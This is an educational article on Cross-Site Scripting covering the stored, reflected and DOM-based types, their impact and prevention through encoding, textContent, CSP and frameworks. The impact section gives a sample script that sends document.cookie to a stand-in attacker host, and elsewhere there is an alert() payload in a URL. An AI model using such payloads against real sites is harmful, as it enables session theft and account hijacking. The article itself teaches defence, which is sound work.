XSS

Cross-Site Scripting (XSS) is a vulnerability that allows an attacker to inject malicious scripts into pages served by a web application. The injected script then runs in the browsers of other users who view the affected page, with the privileges of that page's origin. Unlike attacks that target the server directly, XSS attacks target the users of the application.



An attacker may use XSS to:

  • Steal session cookies
  • Hijack user accounts
  • Capture login credentials
  • Redirect users to malicious websites
  • Display fake login forms
  • Modify website content
  • Perform actions on behalf of a user

Types of XSS

1. Stored XSS

The malicious script is permanently stored on the server.

Examples:

  • Blog comments
  • User profiles
  • Forum posts
  • Product reviews

When other users view the content, the script executes automatically.

Example Flow

  • Attacker submits malicious script.
  • Application stores it in the database.
  • User visits the page.
  • Browser executes the script.

2. Reflected XSS

The malicious payload is included in a URL or request and immediately reflected back to the user.

Example: https://example.com/search?q=<script>alert('XSS')</script>

If the application displays the search term without encoding it, the script executes.


3. DOM-Based XSS

The vulnerability exists in client-side JavaScript that writes attacker-controlled data into the page; the payload may never reach the server, so server-side filtering does not see it.

Example: document.getElementById('result').innerHTML = location.hash;

If an attacker controls the URL fragment, the browser parses it as HTML and malicious code may be injected into the page.


Impact

A common attack is session theft.

Example: <script>fetch('https://attacker-site.com/log?cookie=' + document.cookie);</script>

If session cookies are not protected, an attacker may gain access to user accounts.


Prevention

1. Validate User Input

Accept only expected input formats.

Examples:

  • Email addresses
  • Phone numbers
  • Numeric values

2. Encode Output

Convert characters with special meaning in HTML (<, >, &, ", ') into entities before inserting user data into a page, using the encoding that matches the context (HTML body, attribute, JavaScript, URL).

Example: <script> becomes &lt;script&gt;

3. Avoid innerHTML

Instead of: element.innerHTML = userInput;

Use: element.textContent = userInput;

4. Implement Content Security Policy (CSP)

A CSP helps restrict which scripts can execute on a page, so that an inline script injected through XSS is refused by the browser even when the injection itself succeeds.

5. Use Secure Frameworks

Modern frameworks provide built-in protections:

  • React
  • Angular
  • Vue.js

However, unsafe coding practices can still introduce vulnerabilities.


Published Date: 2026-06-14


Updated Date: 2026-06-14


About the Author: Team absequ is a group of engineers and researchers working on real-world systems, software development, and technology solutions.